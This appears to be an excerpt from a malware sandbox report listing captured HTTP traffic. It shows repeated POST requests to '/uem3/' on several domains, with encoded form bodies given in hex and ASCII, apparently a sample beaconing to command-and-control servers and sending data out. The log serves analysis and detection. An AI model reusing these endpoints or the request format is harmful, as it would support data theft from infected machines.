Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.homesteaddesignstudio.netConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.homesteaddesignstudio.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.homesteaddesignstudio.net/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 52 35 52 61 46 38 52 45 7e 64 76 43 30 32 6c 68 30 58 47 30 66 39 38 6d 6d 6c 45 70 41 44 50 66 45 32 6f 55 7a 44 62 7a 78 66 6e 6d 42 32 53 37 66 72 4c 31 72 37 33 6c 53 36 70 6c 43 55 6f 53 4a 75 56 4f 42 48 31 69 59 6c 62 33 36 4d 37 41 37 36 6d 2d 4e 74 39 61 58 78 61 69 28 66 6e 33 45 68 45 77 4b 34 7e 30 62 39 49 43 39 52 76 37 47 50 32 33 76 47 39 61 28 32 38 62 50 57 56 51 6a 6d 43 41 63 70 35 68 4a 66 62 31 58 39 6d 32 41 35 74 59 44 51 4c 31 45 68 79 78 78 54 35 6f 30 51 78 77 4f 66 4b 43 65 6e 77 74 75 2d 66 50 45 42 31 38 49 56 7e 38 36 72 49 31 59 61 77 38 70 33 56 55 49 6c 6e 71 73 6b 72 5a 6f 33 45 36 5a 45 44 4b 54 32 4a 68 50 54 28 4b 5a 37 57 54 7e 6b 4e 78 41 6b 6e 32 77 67 43 54 56 37 6e 62 65 71 51 67 34 6f 57 6a 53 73 62 30 7a 31 59 67 51 5a 45 7a 32 75 6b 65 77 61 33 6b 31 64 67 5f 31 65 38 78 7e 6b 71 64 30 45 7e 43 6b 79 76 44 6c 34 45 5a 6b 61 46 6b 28 72 78 4e 70 6f 50 31 71 74 39 48 54 46 37 67 54 69 6f 4c 49 70 6d 42 7a 56 58 38 32 75 7a 58 53 76 34 50 5a 6d 44 74 63 4c 47 61 75 69 37 6d 4f 33 74 4d 65 72 51 67 35 6d 34 74 57 72 5a 44 34 33 6f 4b 62 2d 68 37 75 72 6c 35 30 41 5a 2d 37 70 34 69 70 31 6c 49 69 5f 78 59 47 63 4f 34 30 58 55 67 43 35 52 38 38 31 7a 77 7a 42 57 58 63 73 62 48 4a 6c 57 74 6f 68 42 37 49 37 48 62 44 6e 74 68 30 67 5a 51 74 58 59 37 55 54 62 62 6c 6f 6a 4a 28 61 75 6b 36 65 6d 48 62 4e 64 77 68 34 62 43 55 46 38 4b 35 36 68 48 28 6b 4b 6a 65 48 73 73 38 54 6e 76 28 61 33 78 47 70 70 69 55 51 46 4f 53 48 59 6c 43 58 78 6f 7a 74 4e 56 70 33 75 4f 43 50 56 62 37 41 52 35 64 4b 49 77 74 66 57 73 53 58 74 6e 55 33 37 37 52 33 43 4c 70 47 45 74 68 6f 46 47 68 4a 28 45 7a 37 67 6c 79 52 51 4b 32 53 63 33 58 79 51 72 44 68 39 54 39 52 4b 59 33 64 69 4d 43 57 6a 64 42 46 4e 70 67 48 4a 75 4c 56 4d 35 57 64 4d 66 39 74 32 32 47 4e 30 38 56 79 39 62 32 48 56 35 74 6e 46 73 74 61 36 45 33 75 53 4c 42 47 75 43 6e 35 6e 52 41 5f 76 59 55 4b 67 66 6c 30 59 54 65 42 28 35 51 41 44 57 38 4a 32 67 72 6a 66 56 78 5a 64 67 4e 33 47 57 66 73 52 46 32 36 75 69 75 43 6e 47 7a 32 43 7a 30 4f 46 61 4a 6c 38 57 42 46 6d 2d 33 68 6f 36 48 77 34 50 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=R5RaF8RE~dvC02lh0XG0f98mmlEpADPfE2oUzDbzxfnmB2S7frL1r73lS6plCUoSJuVOBH1iYlb36M7A76m-Nt9aXxai(fn3EhEwK4~0b9IC9Rv7GP23vG9a(28bPWVQjmCAcp5hJfb1X9m2A5tYDQL1EhyxxT5o0QxwOfKCenwtu-fPEB18IV~86rI1Yaw8p3VUIlnqskrZo3E6ZEDKT2JhPT(KZ7WT~kNxAkn2wgCTV7nbeqQg4oWjSsb0z1YgQZEz2ukewa3k1dg_1e8x~kqd0E~CkyvDl4EZkaFk(rxNpoP1qt9HTF7gTioLIpmBzVX82uzXSv4PZmDtcLGaui7mO3tMerQg5m4tWrZD43oKb-h7url50AZ-7p4ip1l
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.homesteaddesignstudio.netConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.homesteaddesignstudio.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.homesteaddesignstudio.net/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 52 35 52 61 46 39 38 48 77 4d 54 62 77 6d 35 43 6b 53 4b 6f 4c 38 4d 6b 68 57 6f 32 4d 68 62 2d 44 45 51 2d 38 6a 72 4f 79 65 50 34 45 47 50 5a 56 49 4b 6d 72 2d 62 49 61 6f 63 73 55 42 77 64 4a 71 35 67 42 47 42 69 62 6c 69 79 36 72 28 71 36 5a 65 39 42 74 39 71 57 78 61 4a 73 4f 37 61 45 68 42 6a 4b 34 32 6b 62 4d 45 43 37 7a 58 37 41 4a 7e 47 69 47 39 41 68 6d 73 48 41 32 4a 6e 6a 6d 4b 59 63 6f 46 68 4a 76 48 31 58 64 32 31 4c 61 31 62 4f 67 4b 5f 42 68 79 53 6b 44 6c 53 30 51 46 65 4f 66 32 43 66 56 55 74 76 75 28 50 51 69 74 6a 41 46 7e 35 7e 72 49 43 53 36 4d 68 70 33 5a 51 49 6b 6a 36 73 56 66 5a 71 48 45 6e 54 7a 66 34 55 6b 68 32 4e 54 6a 39 5a 37 4b 2d 28 32 30 30 41 6c 4c 61 33 57 6e 6c 49 6f 4f 32 65 6f 38 47 72 59 57 6e 47 38 61 79 7a 31 59 51 51 5a 46 51 32 71 67 65 77 59 58 6b 33 5f 49 5f 78 2d 38 2d 32 55 71 59 33 45 7e 52 67 79 7a 64 6c 34 73 56 6b 62 39 6b 28 65 5a 4e 71 5a 76 31 6f 50 56 49 4f 31 36 72 62 43 70 65 56 5a 6d 65 7a 56 58 6b 32 76 79 63 52 63 38 50 61 55 37 74 65 70 65 61 76 53 37 6d 42 58 74 4f 52 4c 63 77 35 6d 67 70 57 75 30 30 34 45 45 4b 56 4d 70 37 76 4a 4e 35 79 77 5a 2d 79 4a 34 6a 74 31 6c 34 69 37 64 68 47 59 61 57 31 6d 34 67 44 63 4e 38 37 57 62 77 28 52 57 70 46 63 61 43 59 31 53 4f 6f 68 46 67 49 36 7a 68 45 55 42 68 79 43 52 51 76 6c 77 6b 62 7a 62 66 6b 6f 6a 52 31 36 7a 74 36 65 28 2d 62 4d 67 39 68 70 54 43 55 51 41 4b 30 38 31 47 6d 55 4b 66 66 48 74 7a 32 7a 62 51 28 62 66 6c 47 73 42 69 55 51 4a 4f 54 33 6f 6c 48 57 78 72 78 39 4d 64 33 6e 76 58 43 50 70 4b 37 41 64 35 64 4f 49 47 74 76 47 73 52 32 64 6e 58 46 6a 36 61 6e 43 4a 36 32 46 78 6c 6f 46 4a 68 4a 7e 6e 7a 36 34 31 7a 6a 6f 4b 32 6b 51 33 58 58 6b 72 4d 42 39 48 28 52 4b 36 7a 63 66 68 43 57 48 7a 42 46 78 70 67 31 4e 75 4c 78 51 35 58 39 4d 41 70 74 32 33 55 74 30 7a 66 53 34 4d 32 45 6b 61 74 6a 4a 38 71 73 43 45 33 70 65 4c 41 67 53 4e 6e 70 6e 59 48 5f 76 48 55 4b 68 75 6c 30 5a 41 65 42 36 30 51 42 72 57 36 35 32 67 74 69 66 57 28 70 64 6c 4f 33 47 55 57 4d 52 43 32 36 75 49 75 43 76 73 30 52 48 43 37 4d 59 47 54 44 6b 73 4a 33 66 38 6a 77 59 6f 53 42 70 37 7a 65 63 7a 47 58 59 50 31 74 46 70 7e 68 50 32 73 4f 34 30 54 45 74 71 54 53 75 59 43 56 6e 39 71 73 61 50 49 71 4e 78 47 61 30 51 32 5f 49 64 71 48 62 6b 6d 6e 49 31 62 48 53 37 6a 46 65 70 37 4c 50 63 4b 4c 6c 64 59 47 76 65 6b 30 7e 33 66 6b 46 63 49 58 68 2d 48 32 75 52 35 64 6f 79 46 63 38 65 36 35 74 33 4d 38 64 76 5a 50 5a 6e 61 4e 7a 73 6e 38 79 6b 58 6c 73 48 76 72 65 66 6b 64 75 6e 5a 61 50 6b 32 57 63 4e 35 6d 76 44 30
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.xjyjjy.comConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.xjyjjy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.xjyjjy.com/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 46 65 4f 47 52 47 67 7a 62 38 53 43 52 4a 55 47 54 39 76 2d 7e 6c 70 35 50 35 57 4c 69 79 73 7a 39 41 6a 44 52 53 68 70 39 79 30 51 4c 75 57 5a 34 70 4d 38 42 36 6b 68 28 57 77 36 28 54 69 7a 51 63 37 65 37 30 28 79 49 58 53 50 6a 4e 36 66 6f 4f 68 6d 56 69 33 35 50 65 75 39 53 7a 45 67 34 39 37 4f 4e 6e 4c 34 46 5f 6f 7a 71 37 4c 4c 5a 33 65 4d 56 55 5a 52 63 6f 6c 7a 54 75 4c 6f 75 2d 67 37 68 37 4c 65 73 68 72 6a 65 31 41 6e 61 70 6b 4a 6a 42 32 41 48 4c 51 4c 48 34 6f 43 33 37 79 38 70 69 47 33 70 77 28 67 34 67 51 56 33 42 67 50 78 39 78 35 34 67 7e 71 76 6a 59 4c 34 32 7e 66 32 38 30 5a 55 51 6e 56 58 6c 76 2d 39 58 72 36 59 4f 35 32 48 58 36 53 75 70 53 49 61 35 46 5f 35 37 6e 49 70 6d 67 4b 6e 6e 71 70 4a 4d 46 69 6b 77 74 37 42 67 52 45 75 75 71 76 75 51 37 6b 43 78 45 32 4b 63 64 73 47 67 38 52 45 36 54 50 36 59 42 76 34 4d 67 5a 6f 67 73 4e 33 70 46 77 77 5f 68 69 69 51 46 64 55 30 51 73 54 4a 48 77 61 78 34 55 5a 48 68 7a 67 59 75 4a 35 6f 55 70 76 71 78 5f 76 35 6b 76 59 70 7a 36 47 50 65 57 61 71 4d 33 34 77 43 6c 73 53 79 49 57 65 35 74 6f 78 39 47 49 72 4b 46 41 48 6b 58 7a 77 75 71 4b 4e 46 43 30 37 35 69 5a 45 45 6e 4a 49 66 4c 38 41 50 38 4f 53 76 6f 64 34 54 54 49 49 58 44 50 44 49 62 6d 46 57 67 39 70 50 51 45 4d 34 71 50 44 74 44 70 4d 51 66 30 61 43 79 46 68 54 6c 62 61 63 72 42 48 62 54 35 58 6c 48 38 53 4e 75 28 61 73 4d 56 66 63 47 65 70 5a 55 44 49 66 6f 78 5f 71 46 58 44 43 71 78 7a 69 31 6a 4c 6d 4f 31 52 47 42 39 68 34 5a 35 6d 77 58 43 66 72 49 6c 31 7e 5f 54 54 4a 35 42 33 64 47 62 45 59 6d 57 36 54 52 58 49 56 41 72 52 6c 5f 34 75 73 4c 4a 6b 68 41 32 56 42 37 41 78 4a 48 6d 79 77 4c 4d 44 7a 7a 4d 65 4c 72 31 5a 33 73 6e 72 68 47 42 69 36 4a 67 48 4a 76 65 4a 33 64 34 51 6f 66 63 43 65 6c 52 42 36 67 4e 6c 47 41 6d 42 4e 2d 50 39 6c 46 56 41 43 50 76 73 57 62 7e 38 76 4a 45 4e 62 34 55 57 31 38 71 36 53 36 4b 4c 35 4b 34 48 61 37 75 62 45 79 62 54 30 6a 4b 51 56 57 38 48 30 57 4b 38 7e 34 63 39 4e 47 4b 77 77 41 41 38 4c 57 77 49 6f 7a 54 78 53 47 58 41 39 46 6b 54 35 75 4c 6a 4b 63 63 55 58 48 46 48 61 6c 6c 76 79 6a 34 5f 73 4f 62 4f 54 65 76 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=FeOGRGgzb8SCRJUGT9v-~lp5P5WLiysz9AjDRShp9y0QLuWZ4pM8B6kh(Ww6(TizQc7e70(yIXSPjN6foOhmVi35Peu9SzEg497ONnL4F_ozq7LLZ3eMVUZRcolzTuLou-g7h7Leshrje1AnapkJjB2AHLQLH4oC37y8piG3pw(g4gQV3BgPx9x54g~qvjYL42~f280ZUQnVXlv-9Xr6YO52HX6SupSIa5F_57nIpmgKnnqpJMFikwt7BgREuuqvuQ7kCxE2KcdsGg8RE6TP6YBv4MgZogsN3pFww_hiiQFdU0QsTJHwax4UZHhzgYuJ5oUpvqx_v5kvYpz6GPeWaqM34wClsSyIWe5tox9GIrKFAHkXzwuqKNFC075iZEEnJIfL8AP8OSvod4TTIIXDPDIbmFWg9pPQEM4qPDtDpMQf
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.xjyjjy.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.xjyjjy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.xjyjjy.com/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 46 65 4f 47 52 45 30 66 46 59 69 68 66 35 5a 69 65 76 76 71 31 31 5a 37 4e 4a 69 79 7e 6d 38 73 36 78 7a 70 50 6a 52 2d 38 77 6b 57 50 65 61 30 71 61 4d 30 42 34 38 49 31 44 5a 78 37 7a 6d 77 51 64 53 35 37 30 7a 79 4a 57 71 66 69 73 71 35 70 73 35 6e 57 43 33 46 4d 65 75 65 44 6e 4d 64 34 39 32 74 4e 6e 54 6f 47 4d 38 7a 72 5a 44 4c 62 77 71 54 52 30 5a 54 52 49 31 56 65 4f 47 36 75 36 30 6a 68 36 62 65 73 78 6e 6a 66 57 59 6b 63 75 59 47 75 78 32 59 4d 72 51 6f 4d 59 6b 34 33 37 6d 61 70 69 4b 33 71 43 62 67 33 54 6f 56 6a 6d 38 51 6b 64 78 34 38 67 7e 33 72 6a 55 61 34 32 69 54 32 2d 5a 6b 58 6b 7a 56 58 56 76 39 33 6d 69 48 4f 64 51 32 55 48 50 41 75 70 65 6c 61 49 5a 6e 35 5f 33 67 28 45 34 78 36 31 43 58 4a 4f 70 49 68 51 74 5f 4a 41 51 61 75 75 71 6c 75 51 37 4b 43 77 30 32 4b 64 56 73 47 42 38 52 43 71 54 49 68 34 42 75 35 4d 67 57 73 67 6f 39 33 70 64 73 77 2d 70 69 69 69 35 64 4f 46 38 73 57 73 7a 7a 53 78 34 61 49 33 68 6d 75 34 75 57 35 6f 55 78 76 72 78 56 73 4b 41 76 61 39 66 36 4c 4e 6d 57 4a 71 4d 33 68 77 43 72 6d 79 75 59 57 61 55 6b 6f 77 4d 39 49 59 6d 46 41 53 77 58 7a 53 57 71 47 64 46 43 39 62 35 68 49 55 45 39 4a 49 75 30 38 46 7a 56 4f 68 37 6f 63 5a 44 54 4a 75 44 44 4a 7a 4a 51 70 6c 57 41 33 35 7a 37 45 4d 73 69 50 42 68 35 70 36 63 66 31 34 71 79 56 43 37 6b 56 36 63 76 43 48 61 57 6b 48 34 52 38 53 46 49 28 59 6f 6d 53 73 4d 47 66 39 74 55 54 65 4c 76 76 76 71 44 55 44 43 32 71 44 75 61 6a 4c 7e 61 31 51 36 42 39 68 30 5a 35 58 41 58 48 59 28 4c 6c 6c 7e 34 53 54 49 36 42 33 42 78 62 45 30 6d 57 37 32 6d 43 6f 46 41 72 77 31 5f 78 34 78 64 47 30 68 4f 31 56 42 61 54 68 4a 55 6d 79 77 70 4d 47 50 6a 4e 73 7a 72 30 4b 28 73 6b 50 31 47 50 43 36 49 69 48 49 30 49 4a 72 68 34 51 38 6c 63 44 69 6c 53 7a 75 67 58 45 6d 41 67 68 4e 39 45 74 6c 4d 4e 77 43 45 35 63 61 42 7e 39 4b 71 45 50 54 4f 55 6a 46 38 71 39 57 36 4e 6f 52 4e 34 58 61 30 72 62 45 74 62 54 31 53 4b 51 56 73 38 44 6f 38 4b 5f 7e 34 65 4e 4e 47 65 42 77 66 61 38 4c 54 33 49 6f 44 46 42 53 64 58 41 39 52 6b 54 78 41 4d 55 7a 73 63 33 71 51 42 6b 62 6f 73 4e 7e 38 6a 75 35 4d 51 5f 4b 5a 7e 6e 71 31 30 49 55 77 44 7a 48 70 45 59 34 68 65 32 67 33 52 78 66 48 70 67 56 74 46 6d 30 41 77 53 38 4d 30 54 6d 42 54 4c 71 79 4b 68 65 50 39 57 73 67 56 4d 58 64 6c 62 62 71 41 69 56 79 4c 31 45 62 4a 75 58 68 6a 59 7a 49 70 5a 79 4f 41 53 41 79 4f 53 59 31 73 58 46 63 6c 62 53 4d 61 42 77 6b 68 63 41 55 58 76 6a 38 32 4c 47 76 49 39 76 30 58 30 66 7a 58 31 6c 69 64 4e 54 2d 67 49 5a 74 76 32 49 47 42 67 59 4d 4d 78 4e 47 66 6d 63 64 63 69 39 61 6c 31 66 31 53 5a 39 77
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.duckholland.comConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.duckholland.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.duckholland.com/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 33 76 43 6a 70 42 30 47 68 56 54 79 38 53 42 48 53 33 56 4d 6a 66 4d 55 6d 31 55 47 41 78 46 32 4b 66 72 44 51 5f 64 51 49 6a 62 4d 5a 51 43 6f 4a 62 39 49 32 58 79 5f 65 48 77 70 61 69 63 4a 7a 69 48 2d 43 6c 79 63 4c 46 32 61 42 4f 68 6f 34 45 4a 79 57 44 64 39 67 5a 72 41 70 53 37 54 57 37 69 34 30 4f 6a 68 7a 54 30 2d 4e 65 34 4a 51 33 79 4d 36 36 51 70 70 58 28 44 55 59 70 4f 49 56 47 43 6d 78 69 76 52 33 6e 69 75 6f 6c 78 39 64 54 41 4f 6b 6b 79 71 42 47 38 34 70 45 65 56 4d 67 50 5a 68 4d 65 64 76 75 53 42 52 32 32 42 4d 61 30 70 5f 6a 71 65 72 66 79 76 5f 6b 70 52 73 6a 7a 61 76 4b 6a 62 75 66 69 6c 73 43 4d 6d 67 31 58 77 6d 62 4b 47 36 43 6e 76 46 42 79 63 70 61 6c 6e 37 4d 50 7e 48 4c 37 33 6c 4e 55 46 5f 6d 7a 77 69 6b 4c 74 63 68 57 7e 56 75 51 77 42 7e 58 28 72 6a 46 35 6c 4a 6c 6e 6e 7a 57 62 4f 64 51 39 34 6e 2d 30 69 64 68 76 6a 6b 58 39 7a 68 30 28 44 77 76 76 51 31 53 41 72 39 2d 66 67 7a 53 45 34 77 32 31 36 79 71 50 53 6e 68 56 59 49 7a 64 4f 7a 31 5a 69 43 39 64 6a 57 44 4e 69 73 33 47 54 38 42 6b 34 55 58 28 42 50 4c 54 78 36 63 65 6b 69 5f 6a 56 6a 48 61 4b 76 35 48 66 75 43 66 49 57 71 50 6d 72 32 63 73 32 63 69 49 6f 42 71 64 61 39 39 66 6d 44 77 6a 31 33 79 71 6d 6e 74 46 74 6d 45 70 6e 77 6c 4a 48 6b 59 34 55 75 6b 75 6a 39 73 45 50 6f 50 48 62 31 4a 45 43 54 33 5f 38 4a 54 72 62 4d 74 46 4e 72 6a 71 4b 30 5a 38 6a 51 59 45 67 52 65 53 59 6e 68 66 33 6b 62 4c 78 44 42 4f 73 58 30 31 71 61 61 6e 50 7a 73 30 64 76 59 4a 46 2d 65 70 33 39 42 4c 36 6e 28 59 67 4c 44 4a 38 45 58 53 4b 4c 4d 6a 59 6b 51 7a 68 30 31 63 28 70 56 51 53 42 7e 4a 61 67 6a 58 4e 43 4c 5f 51 4a 49 61 49 75 70 6a 43 46 76 2d 49 38 32 5a 71 33 71 42 51 68 54 76 7e 71 48 72 61 6c 72 30 41 79 58 4e 44 55 74 45 70 42 41 59 73 52 6a 42 41 34 28 31 6d 2d 61 71 64 4f 4f 38 43 55 4a 39 76 56 34 4a 61 44 77 30 37 6c 74 70 31 75 62 58 77 34 67 66 54 69 33 58 4e 62 75 76 45 62 59 32 68 69 64 5a 42 4d 51 65 62 31 33 77 69 71 59 58 6e 69 7a 69 68 70 76 66 69 2d 6b 53 64 62 50 6e 51 78 58 5a 61 38 54 37 56 70 67 45 76 76 59 63 68 4a 71 78 71 44 57 68 4d 6a 71 69 43 72 4d 4b 67 55 36 35 57 5a 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=3vCjpB0GhVTy8SBHS3VMjfMUm1UGAxF2KfrDQ_dQIjbMZQCoJb9I2Xy_eHwpaicJziH-ClycLF2aBOho4EJyWDd9gZrApS7TW7i40OjhzT0-Ne4JQ3yM66QppX(DUYpOIVGCmxivR3niuolx9dTAOkkyqBG84pEeVMgPZhMedvuSBR22BMa0p_jqerfyv_kpRsjzavKjbufilsCMmg1XwmbKG6CnvFBycpaln7MP~HL73lNUF_mzwikLtchW~VuQwB~X(rjF5lJlnnzWbOdQ94n-0idhvjkX9zh0(DwvvQ1SAr9-fgzSE4w216yqPSnhVYIzdOz1ZiC9djWDNis3GT8Bk4UX(BPLTx6ceki_jVjHaKv5HfuCfIWqPmr2cs2ciIoBqda99fmDwj13yqmntFtmEpnwl
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.duckholland.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.duckholland.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.duckholland.com/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 33 76 43 6a 70 42 35 46 28 32 57 6d 77 69 4e 6b 55 46 6c 51 74 4f 38 53 6a 45 45 4a 50 55 4d 6f 4e 74 66 58 4e 72 5a 74 5a 52 62 57 64 6b 6a 34 43 36 31 41 32 56 71 43 58 52 59 74 64 43 67 4b 7a 69 66 55 43 6d 65 63 49 47 33 42 41 6f 39 47 34 6d 68 78 51 6a 64 4e 6a 5a 71 51 7e 6a 32 7a 57 37 57 67 30 4f 72 78 7a 6e 30 2d 4e 38 77 4a 53 30 4b 54 30 36 51 6a 31 48 76 50 4c 49 73 6b 49 56 75 4b 6d 7a 32 76 51 48 37 69 74 49 31 77 73 4f 4c 44 44 55 6b 39 36 52 47 6c 7a 4a 4a 6e 56 4d 6c 67 5a 6b 73 65 64 61 32 53 43 68 57 32 41 5f 79 72 39 5f 6a 6a 50 37 66 37 72 5f 67 43 52 73 7e 79 61 75 50 65 63 66 72 69 33 4d 43 4a 78 44 55 69 68 46 7a 6e 4b 5a 66 50 76 46 38 75 66 34 48 77 6e 35 59 4b 75 6b 69 54 34 68 31 75 46 36 28 6d 6a 53 6b 48 6d 38 68 33 7e 56 75 4a 77 42 7e 70 28 72 54 46 35 69 74 6c 39 48 66 57 61 65 64 54 7a 49 6e 5f 34 43 63 6a 34 54 70 30 39 7a 35 6f 28 42 67 76 75 6c 56 53 42 34 31 2d 59 46 66 52 49 34 77 34 7a 36 7a 33 43 79 6e 2d 56 59 4a 65 64 50 7a 6c 5a 52 32 39 63 32 36 44 4d 41 30 33 45 44 38 42 68 34 55 47 31 68 44 62 54 78 6a 58 65 67 6e 4b 69 6b 6e 48 62 59 6e 35 48 2d 75 43 59 34 57 71 48 47 72 33 4c 63 32 57 69 49 59 4a 71 64 37 67 39 4f 71 44 78 48 78 33 7a 49 4f 6e 73 31 74 69 4b 4a 6e 71 79 38 65 43 59 37 6f 6d 6b 72 62 74 73 31 4c 6f 4e 6c 44 31 49 78 75 51 7a 50 38 4e 42 62 62 71 77 31 42 51 6a 75 6d 65 5a 2d 32 4c 59 33 77 52 65 47 4d 6e 78 71 44 6e 66 37 77 49 41 4f 73 54 7e 56 75 31 61 6e 47 6f 73 78 39 76 59 4b 68 2d 66 5a 48 39 45 4d 57 6f 79 6f 67 4d 63 35 38 75 58 53 4f 38 4d 6a 45 6b 51 33 70 6b 31 4d 76 70 56 78 43 42 39 37 43 68 33 33 4e 41 4b 5f 51 5a 65 61 49 62 70 6a 44 57 76 5f 42 37 32 72 53 33 74 54 59 68 54 4c 4b 71 44 72 61 6b 34 45 41 32 54 4e 50 76 74 41 4a 76 41 61 6f 52 6b 79 30 34 28 58 75 2d 66 4b 64 4a 42 73 43 56 42 64 76 65 72 5a 57 33 77 30 6a 48 74 6f 56 59 61 68 49 34 67 64 72 69 7a 43 68 63 75 66 45 61 4e 47 68 39 64 5a 41 39 51 65 62 58 33 77 32 36 59 58 66 69 78 53 68 70 6e 39 4b 5f 67 43 64 65 49 6e 51 46 4d 4a 61 72 54 37 55 61 67 45 6e 56 5a 71 67 72 6e 43 7a 66 57 6e 63 76 68 41 44 4d 4d 59 6f 47 36 35 62 42 4a 50 7e 76 63 53 74 6c 6b 37 67 41 4c 61 61 31 39 49 76 6e 37 48 6d 77 6a 6e 54 79 35 31 41 68 76 63 50 64 31 51 53 34 37 6c 65 45 73 5a 32 49 42 6a 73 32 59 51 69 6c 56 49 34 61 33 78 64 51 55 75 63 61 65 69 6d 74 35 47 31 79 52 58 69 45 58 4d 65 6b 28 2d 70 36 36 41 4e 72 7a 71 70 4a 78 74 36 46 79 59 39 33 70 43 44 4e 76 6a 76 5a 47 37 37 52 4c 76 54 6a 62 59 69 46 45 4c 71 7a 42 6a 6c 33 50 48 53 5a 6b 59 58 70 61 38 50 48 70 5f 4d 66 33 42 4d 53 32 6a 44

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jun 2022 19:08:51 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6d 69 6e 69 73 32 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.timinis23.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 21 Jun 2022 19:09:19 GMTContent-Type: text/htmlContent-Length: 291ETag: "629e390f-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> 